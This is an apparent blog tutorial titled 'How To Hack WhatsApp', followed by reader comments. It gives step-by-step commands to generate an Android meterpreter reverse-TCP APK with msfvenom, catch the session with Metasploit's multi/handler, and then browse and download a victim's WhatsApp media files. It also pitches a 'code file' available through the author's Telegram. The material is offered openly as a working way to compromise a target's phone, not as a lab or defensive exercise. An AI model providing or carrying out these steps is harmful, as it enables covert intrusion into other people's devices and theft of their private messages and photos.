How To Hack WhatsApp |
Code file is available at Bottom of post [ script file ]
How to Hack WhatsApp account
For You :- Best Hacking Tutorial
How to hack watsapp account
Meterpreter:
Let’s open your Kali Linux Terminal and run the ifconfig command for checking our local machine IP address.
Hey this tool is now updated and 100% working so for security reasons of our website we ll provide this code file on my Telegram account so for code file contact me on my telegram account
ifconfig
Now we have our local machine IP address, in my case my local machine IP is 192.168.1.23, in your case your IP address is different, After get the machine IP we need to create a msfvenom Android Payload let’s run this command for creating android reverse Payload.
msfvenom -p android/meterpreter/reverse_tcp lhost=<IP> lport=<use any port> R > output_path_here.apk
After hitting the Enter keyboard button our payload is successfully generated now we need to start our Metasploit payload listener run the msfconsole command.
msfconsole
Our Metasploit framework is stated let’s load the android meterpreter reverse payload using the multi-hander exploit..
use exploit/multi/handler
Now set your local machine IP address, After set the lhost IP address I direct exploit the payload, if you use a different port for your payload you need to change your lport you can change your lport using the set lport <> command.
set lhost (YOUR IP)
exploit
Now our reverse TCP hander is stated let’s send the payload in your target mobile and run the payload on target mobile.
After open the android payload we will get a meterpreter session as we can see the in picture.
After getting a session we can run any Linux command let’s change our current working directory using this command.
cd sdcard
ls -l
Now we are inside the target mobile phone again we change our directory sdcard to Whatspp Directory.
cd WhatsApp
ls -l
Watsapp hacking methode
here we can see our target mobile Whatsapp Files and directory let’s move the Media directory.
cd Media
ls -l
After coming to the media folder, we can see the ALL media folder now I’m going to download our target Whatsapp images again change the directory using this command.
cd WhatsApp \ Images
ls -l
You can see here your target Whatsapp image you can use the ls command for listing all images and you can download any image file using the download command.
download (YOUR FILE NAME)
- It is easy to use, lots of beginners can use it
- Remember, this is a metrepreter attack.
- If u have any doubts then u can msg me on my telegram group
HackHack
ReplyDeleteThanks bro this is really working method can you please provide me Code file
ReplyDeleteThis is really a great content ever I found on internet . Thanks bro. I ll contact you shortly on telegram plzz teach me privately
ReplyDeletePost a Comment